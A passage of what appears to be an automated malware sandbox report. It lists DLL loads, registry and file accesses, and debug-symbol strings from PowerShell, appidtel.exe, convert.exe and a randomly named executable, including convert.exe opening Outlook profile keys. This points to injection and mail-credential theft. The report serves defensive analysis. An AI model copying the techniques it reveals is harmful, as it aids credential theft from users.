Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\convert.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000008.00000002.2502842295.00007FFD34860000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: appidtel.exe, appidtel.exe, 0000000A.00000003.2629248061.0000000003729000.00000004.00000020.00020000.00000000.sdmp, appidtel.exe, 0000000A.00000002.2727778625.00000000038D0000.00000040.00001000.00020000.00000000.sdmp, appidtel.exe, 0000000A.00000003.2627277075.000000000357A000.00000004.00000020.00020000.00000000.sdmp, appidtel.exe, 0000000A.00000002.2727778625.0000000003A6E000.00000040.00001000.00020000.00000000.sdmp, convert.exe, convert.exe, 00000013.00000003.2729543157.00000000032CB000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 00000013.00000003.2733109530.00000000034B8000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 00000013.00000002.2977110762.00000000037FE000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 00000013.00000002.2977110762.0000000003660000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: appidtel.pdb source: convert.exe, 00000013.00000002.2977602776.0000000003C8C000.00000004.10000000.00040000.00000000.sdmp, convert.exe, 00000013.00000002.2974673632.0000000002F44000.00000004.00000020.00020000.00000000.sdmp, mNqSPruzCXM.exe, 00000018.00000002.3537079576.000000000259C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.3534781987.000000002F20C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: appidtel.exe, 0000000A.00000003.2629248061.0000000003729000.00000004.00000020.00020000.00000000.sdmp, appidtel.exe, 0000000A.00000002.2727778625.00000000038D0000.00000040.00001000.00020000.00000000.sdmp, appidtel.exe, 0000000A.00000003.2627277075.000000000357A000.00000004.00000020.00020000.00000000.sdmp, appidtel.exe, 0000000A.00000002.2727778625.0000000003A6E000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 00000013.00000003.2729543157.00000000032CB000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 00000013.00000003.2733109530.00000000034B8000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 00000013.00000002.2977110762.00000000037FE000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 00000013.00000002.2977110762.0000000003660000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: convert.pdb source: appidtel.exe, 0000000A.00000002.2727615136.00000000033A7000.00000004.00000020.00020000.00000000.sdmp, mNqSPruzCXM.exe, 00000011.00000002.3536147480.0000000001288000.00000004.00000020.00020000.00000000.sdmp, mNqSPruzCXM.exe, 00000011.00000003.2670887482.000000000129B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000008.00000002.2502842295.00007FFD34860000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: convert.pdbGCTL source: appidtel.exe, 0000000A.00000002.2727615136.00000000033A7000.00000004.00000020.00020000.00000000.sdmp, mNqSPruzCXM.exe, 00000011.00000002.3536147480.0000000001288000.00000004.00000020.00020000.00000000.sdmp, mNqSPruzCXM.exe, 00000011.00000003.2670887482.000000000129B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: dnlib.pdb source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: mNqSPruzCXM.exe, 00000011.00000000.2643006321.000000000026E000.00000002.00000001.01000000.00000006.sdmp, mNqSPruzCXM.exe, 00000018.00000000.2801120472.000000000026E000.00000002.00000001.01000000.00000006.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: appidtel.pdbGCTL source: convert.exe, 00000013.00000002.2977602776.0000000003C8C000.00000004.10000000.00040000.00000000.sdmp, convert.exe, 00000013.00000002.2974673632.0000000002F44000.00000004.00000020.00020000.00000000.sdmp, mNqSPruzCXM.exe, 00000018.00000002.3537079576.000000000259C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.3534781987.000000002F20C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
